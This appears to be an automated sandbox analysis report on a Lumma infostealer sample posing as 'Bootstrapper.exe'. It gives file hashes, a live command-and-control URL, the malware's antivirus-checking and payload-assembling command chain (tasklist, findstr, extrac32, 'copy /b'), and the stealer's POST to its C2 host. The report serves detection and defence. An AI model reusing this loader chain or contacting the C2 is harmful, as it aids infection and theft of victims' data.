Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19/01/2025, 19:09 UTC

General

  • Target

    Bootstrapper.exe

  • Size

    120.0MB

  • MD5

    6a4e34aa83f72c212e76e1c228af6666

  • SHA1

    bff7c730078f0ccf5aa00c52ec0cc2fe38bd1f56

  • SHA256

    828b3c4a8e2c1eddc6bc54c1928ec562a9d4254f84a5545fa83d23419686240c

  • SHA512

    37f0d3ad8017357164aaed7664ce628491d5215c686fc798698db6d6b0f15705052dd6a10d39e8b5c98c6ba62e0f0eb451d581e3ecff530bd96cd4fb80998cfc

  • SSDEEP

    24576:utnbbEhDUbdE6bLdFiClougeEqsseyHCIAtcVZ0EIrGFTb7Tb7j:MEs/PdlhgPqsseyQtxE/Fr

Score
10/10

Malware Config

Extracted

Family

lumma

C2

https://deedcompetlk.cyou/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Briefly Briefly.cmd & Briefly.cmd
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2448
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2268
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1776
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2732
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 347157
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2600
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E National
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2720
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "Cheese" Difficulties
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1680
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b 347157\Folding.com + Saddam + Visa + Bowling + Rt + Chapters + Advertise + Continuous + Accessibility + Destruction + Architectural + Any 347157\Folding.com
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1344
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Basement + ..\Florida + ..\Passenger + ..\Msg + ..\Welding + ..\Terrace + ..\Stretch j
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1972
      • C:\Users\Admin\AppData\Local\Temp\347157\Folding.com
        Folding.com j
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1936
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2396

Network

  • flag-us
    DNS
    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV
    Folding.com
    Remote address:
    8.8.8.8:53
    Request
    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV
    IN A
    Response
  • flag-us
    DNS
    deedcompetlk.cyou
    Folding.com
    Remote address:
    8.8.8.8:53
    Request
    deedcompetlk.cyou
    IN A
    Response
    deedcompetlk.cyou
    IN A
    172.67.164.84
    deedcompetlk.cyou
    IN A
    104.21.73.171
  • flag-us
    POST
    https://deedcompetlk.cyou/api
    Folding.com
    Remote address:
    172.67.164.84:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: deedcompetlk.cyou
    Response
    HTTP/1.1 200 OK
    Date: Sun, 19 Jan 2025 19:10:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=r60hhimlvol4k4cig7ch0q8usg; expires=Thu, 15 May 2025 12:56:40 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLleWf%2FUABzO29%2F5a7AQepcYR5dm0%2FpbxEpjaouLwUL1RVw4CMkAQe2fQgCkYDAzAx9aKy78sSkkivumsV2yECqIGYl6sKIFBWow%2B6VR2d7LzsmuILMfmco%2FVBFf7i1b2XFYkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90491f5b3e539499-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=40727&min_rtt=25970&rtt_var=34617&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2861&recv_bytes=585&delivery_rate=130284&cwnd=253&unsent_bytes=0&cid=b459c66cd7fed376&ts=351&x=0"
  • 172.67.164.84:443
    https://deedcompetlk.cyou/api
    tls, http
    Folding.com
    981 B
    4.5kB
    9
    9

    HTTP Request

    POST https://deedcompetlk.cyou/api

    HTTP Response

    200
  • 8.8.8.8:53
    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV
    dns
    Folding.com
    85 B
    160 B
    1
    1

    DNS Request

    oAyWcyFUJZdMRXTkifV.oAyWcyFUJZdMRXTkifV

  • 8.8.8.8:53
    deedcompetlk.cyou
    dns
    Folding.com
    63 B
    95 B
    1
    1

    DNS Request

    deedcompetlk.cyou

    DNS Response

    172.67.164.84
    104.21.73.171

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\347157\Folding.com

    Filesize

    1KB

    MD5

    bc0c466ea461f70dc2bab92020f1e643

    SHA1

    f17c66912508e95eac59bda2e773849600471a88

    SHA256

    f3c6eb4b4f81b5e1aa458d46225dccd651a2d44d1367a14718b6bb76beec1de1

    SHA512

    b1d03c359b8fcf46e7f07536004f7d11ab7bdd0cb044ca7bcfe63501428c4c93e43591e8367e5676478da8d554e4bd579cb6e37dc617f97f8a54a372361073c9

  • C:\Users\Admin\AppData\Local\Temp\347157\j

    Filesize

    494KB

    MD5

    549720d78c44a4ca96f98a02d7376be0

    SHA1

    c18a7ddd59ea61df41acfac5544aadc72bb6acba

    SHA256

    37204d5c24cd97f012e61ba6c4aab3f6bd8778237ecbec3080fa54bfa5dcaf67

    SHA512

    392674f314a993f0eb2e22354a9922b006e28b01cb2abdf416a188e48b8fbbea8df93cb793cefd6e91259b7de71c502ac1e5c33273d94e1a3671ee1147cbdab4

  • C:\Users\Admin\AppData\Local\Temp\Accessibility

    Filesize

    118KB

    MD5

    539587208032af4b529a60d530f100a4

    SHA1

    ef39ddfa82f53bde5a674e51318aa3ce9a8789b2

    SHA256

    bcee5e27e34159419173575bf6e22e23f0dad46cf6fa6aa84a1bb01c96516662

    SHA512

    4c261199485e6a40ce46147c98e244f1297446115ebd6c944a29e4242b361816980ccb6096286c8f9dbec00f13ea9fdfa417648980bf06721abc866630c5e53f

  • C:\Users\Admin\AppData\Local\Temp\Advertise

    Filesize

    55KB

    MD5

    eaab0c7db38adca2364923dc1bb8bacf

    SHA1

    182819623bdee90678ae233b8094d05e51d48d68

    SHA256

    5a5c226453b9c7c7f7bdb980ad2a02838456f9420d182d14c7336f8264a894f0

    SHA512

    53d2c6559e2d1e71b62f91444608f1e61a246433499b75d6e3193cfd645ac4af3c4e4e1359da02b522d1e121de31f51d0010d96e8ef435a92328cef69aba4910

  • C:\Users\Admin\AppData\Local\Temp\Any

    Filesize

    15KB

    MD5

    59051edf957c7f4fec5e278f07cfdaa9

    SHA1

    409217185334c187412941583e5814753d3f670f

    SHA256

    71cb36f1506fa645a90a6f06619b67c4f2f0e1e0140bac2e6f8a91ed1988446f

    SHA512

    f1897fa7dcc38c845cc3862f1eb33d493ca6c09338a6a7817fac6e99a72ecd07001a84e1935eccddf58e163fd8396c3333fad4c365cd5c8ade281dbc84735aba

  • C:\Users\Admin\AppData\Local\Temp\Architectural

    Filesize

    102KB

    MD5

    ac3b8c0b9d965801a696519bc3bce457

    SHA1

    c2fb54f9d7ffbbea6e5db175ca214eccc0b8ee7c

    SHA256

    fbc3b647efe255870931d9dfa77a43c7248a7d8613712bcf0663862a4e97fb66

    SHA512

    0aeeb7d05c46063a892b3aae756bfb92f245aae66c2fcd4c34610a348ad0c0904addabb99d97ca0c9c3cba3df7e8e96500f084b840487a9ed2582d1badf638c6

  • C:\Users\Admin\AppData\Local\Temp\Basement

    Filesize

    63KB

    MD5

    44a805a4e5ba191661485ef167275506

    SHA1

    45c2594c944f02e5260bd97a185c2f21ab232182

    SHA256

    e394dccd197c59fa4e2da7146174485a6681946d34faa3007bd5c1419d7125e0

    SHA512

    a3a8f7283ca0a0ae16b21f2b81b9cd48b953112c50e64b99daba378cd0e098108512566208365db4bb7b78355439f94bbcace6f5169091fab0202cf7d55f1952

  • C:\Users\Admin\AppData\Local\Temp\Bowling

    Filesize

    106KB

    MD5

    7cbcc0fbb084bead6d5bbb8a00cbb997

    SHA1

    75bfaaa5232ab2cf9f2291ee1ce08f2acb076ebb

    SHA256

    e0a98926b1e0968481640078ac6b833af96773a7f715851634346379f282795d

    SHA512

    6b33f8afe19a28e5b300e8a32c3ec98a0365fc1594c693c4527d9b0275f46f6558c50e29417499650d9c1ea7091ea7af340c4111b90af06c5ab4277170170c9a

  • C:\Users\Admin\AppData\Local\Temp\Briefly

    Filesize

    23KB

    MD5

    bb009bb1ab11657dd763b3a85e90f26f

    SHA1

    32fb786e48105f1574e8d345e66d2b16fc051d6e

    SHA256

    e7b3f1da61a207080f7859d12764b1243ce5c84beaf1a7f026b3d0da5f9dec4c

    SHA512

    ac73396967c496b93f8d4084537a286b4d5fe1315b0fd5992b03cc019521c1c25bafcb9826f85af59495a01ec711a2ec789c43af5befa46557f99224d0ce92bc

  • C:\Users\Admin\AppData\Local\Temp\Chapters

    Filesize

    56KB

    MD5

    19f399e75e91c4917cce10422db7b0fb

    SHA1

    145fb431681a91d64a77b0ca99ba31b4ed7457b9

    SHA256

    bbe32640a1be9b9dc5570043a2c72bd3d1da1e3480e61e41a1dc8daa42b07bd7

    SHA512

    25b85fe872e3e9fc5e70d3dfd1647a6bbf2919d67126bb9007dcc61aae549d64a9b79fd3c05bc996202b03630420ecb4eb5b5613d0a1adeab0d2670e6a5aff6f

  • C:\Users\Admin\AppData\Local\Temp\Continuous

    Filesize

    119KB

    MD5

    87cfc9cbddca81f037640e23869fd727

    SHA1

    e71c0a8106944e238edba3b2d6194cf5cb383168

    SHA256

    f648aed5047fa8e5b99ce81cf85f05f4cfb193b8b349e6e5656e5c6dd0917cb2

    SHA512

    2a3c9bbdbd222f9328b1379de025bff3f8d2c693fe68558cdb24a516ee7c9ac6615a9d1d62e4682532f8567138e67e6c26b6c7068d87b00415fc915172928e4f

  • C:\Users\Admin\AppData\Local\Temp\Destruction

    Filesize

    75KB

    MD5

    e9ed56e42470ceb7a46263c49b9d8110

    SHA1

    13794b6f705be789af214a4f81585dee3710512b

    SHA256

    d97494026b70f37cabc0ac614f54206ae2c5a5ab601b71888ae6491241dc2b20

    SHA512

    ca1c0f00a68267274e9d31f3a2de0fb34ccfce0a57d67ffe76633fe1a156c05f1381b0c696f75898fd8b370cb8a6e56174bdfb43729ab2668e444ee6748d8040

  • C:\Users\Admin\AppData\Local\Temp\Difficulties

    Filesize

    1KB

    MD5

    d2ac6356ed5ed3a32e46acb2f47d68f5

    SHA1

    e41205fe32c1ed0cc4a265e942dd472a76a22592

    SHA256

    6b6a43352b0b87107609d9c91992b30069200b308e5a2a50ed5a931315f82bdc

    SHA512

    47bafca4c789c7fad4db0534a93b8c7b659abb999393425f58d9b28ba553be1cc45b9001da1d5820e65b107034f48cd441c6855c7d7fc08117985d81054394a0

  • C:\Users\Admin\AppData\Local\Temp\Florida

    Filesize

    81KB

    MD5

    35ee0a5fee1964bd57f2c66347d726df

    SHA1

    d37bb5ba2456a310891f93d8e9ae1ad196dabcf6

    SHA256

    9b8ab89609b074479bc9fe749e12792c34ab4799ea7ea5ac67cdd3758a1c1181

    SHA512

    2006b993a36599a56131d744ea750a3de3d5eeb629d111d751d552e86cf3a4ea1c7d9b9dbb727e77b65ec8684cf0f22476840aed73df15186041b087476c0689

  • C:\Users\Admin\AppData\Local\Temp\Msg

    Filesize

    91KB

    MD5

    478eae0d2d8bc46181226c275688315d

    SHA1

    674d1c954b6ba8bc77ea6e112912b2fbde64fbeb

    SHA256

    aae6d5fc0e80a6033d55b81e05db13c66604f5fe453f78440de3912a44c553c1

    SHA512

    9833ef8d0d29cbf1b1738eefd4c175a169c770f70f2699bde703092e5102439c779e7474866534bba6b58f49d160a49be0750b686c171415191ddb10469eb26d

  • C:\Users\Admin\AppData\Local\Temp\National

    Filesize

    478KB

    MD5

    f5406ccecddc6c9bd30ed30343c756ab

    SHA1

    080ebf3593ee3c272e7e4f7c98fee6d326da45f8

    SHA256

    a46bd5c1472f8b655ace3314ca667d39b10d989b6f8ed17b6c753b8b947a6938

    SHA512

    a25eba5ea58855e65c529b858399b1574ccbed89038e90d50170562eceb11efba4f16242d54ad3b5232edc11f3f61109bbafc4398124c1bb45e43693657b1e81

  • C:\Users\Admin\AppData\Local\Temp\Passenger

    Filesize

    68KB

    MD5

    355fafaeefdaaa291b3f48356e24216c

    SHA1

    c675a50bffcf18f357966ec51e0adaf05a25b86b

    SHA256

    d3210c22706049ab7ca2304fd17507bfa4a842af579a00b60644e09178f9fddb

    SHA512

    f2fb4e46b4d6b24cba584e51c6a43e8ed1174a5048a69bd61a6e24e2772f389e55c2f6384d1ffe7c6f44eab8a6fe059608e39a0a60ad30f06eb63589c723ab4d

  • C:\Users\Admin\AppData\Local\Temp\Rt

    Filesize

    86KB

    MD5

    fc6c4e0bdb11443834c6af5b2ff6e6bb

    SHA1

    3c4bf0970e36371844c9a27a041fd09cbf65cf56

    SHA256

    445d2c74ae1ba5af2eba4cc4a4deeabbda1ef920e272ce9f54a7d9374eb23402

    SHA512

    9588272669bf2ecf277c83c836be28d4757a21b033e9919747fc11a7767abaf5d3af002d3379626b65e537aaa8fd2e30113994353592bcee577f3fbdd02dea5a

  • C:\Users\Admin\AppData\Local\Temp\Saddam

    Filesize

    54KB

    MD5

    7b8c4652937f053027395d23ef6c5b93

    SHA1

    3e203439da403069184a56d40d00b51e8a03a2cf

    SHA256

    733b3e2f49984688e345d1acb07d22c9d5e44742f572fd610c114c50c04c3024

    SHA512

    67b5aac27923f00fa7e39cefb6adc6714845cc9e3db51aa2fe8c910e09f95b2fe46ddc901257afa63ede0988792ee6245089ea419bd257e53f05c926793de929

  • C:\Users\Admin\AppData\Local\Temp\Stretch

    Filesize

    58KB

    MD5

    110f9b2d470e415d55f8a0d78ae1f8a1

    SHA1

    eeb9c0bf82f9a797fceed7d9725221348f45dcf1

    SHA256

    fbafdc9359e5294e8410d3862aee050c5cc03aec557bd83345bdca27981c0138

    SHA512

    1a8bf9fe93ff1b8cff52191bae71fed8822f4d99dd59ee6420709d037e26a185695e819535c793ffbe849e63637725e9ebdf487b57bb8f1ec3b4852e93954551

  • C:\Users\Admin\AppData\Local\Temp\Terrace

    Filesize

    50KB

    MD5

    6f3b4f30afb0c2fc164daaee95348815

    SHA1

    c59e8d78f11d5af9aca282d52752c0846292d5e6

    SHA256

    987fdfe4cb214563ecd4ba6d1990284e485a7701c323c1564d9d4afd3554c890

    SHA512

    ce51ba253dc008b82ae51ac797362f93515b1ef481d6189f596f74c1172379bfa4bb86aa713ea62520a11c24281047aaee0d203d48fa1f3dcdc5121fff385809

  • C:\Users\Admin\AppData\Local\Temp\Visa

    Filesize

    137KB

    MD5

    0fffca2125ec2d790c02b2bcd12ec8aa

    SHA1

    55883ab44b36fa0efe4747e2653786fbda5b60a5

    SHA256

    9dc03047dec2d31586916298828447b291b3eadae317bab07f8917e4bf4dde96

    SHA512

    53d6bb959d2d5ad5b3be4dde2b6c877eee4ae65e411f095bad980fc6ee58f49437dc8503186d544ab60aa6824cd70e616bf79cc13b713e27c5f75640db8ed70f

  • C:\Users\Admin\AppData\Local\Temp\Welding

    Filesize

    83KB

    MD5

    9a2d8d245f55c0918e6a7e8b9e22ed25

    SHA1

    827ace99c5e1570e3ea912e67dcf7ef6851c3ee1

    SHA256

    e252cd74c35df37627de02488911ecfc1d57320be7dec21a7de03ccb9664d84b

    SHA512

    076fba85e84cb31486a947e31c39464e08faacdad7b26645699f39fbe6f3d6bc6a7b926f46909f227e9c78f2ce8d9c2af0871e057db10345504db2226a2272c1

  • \Users\Admin\AppData\Local\Temp\347157\Folding.com

    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • memory/1936-581-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-580-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-582-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-583-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

  • memory/1936-584-0x0000000003AC0000-0x0000000003B1B000-memory.dmp

    Filesize

    364KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.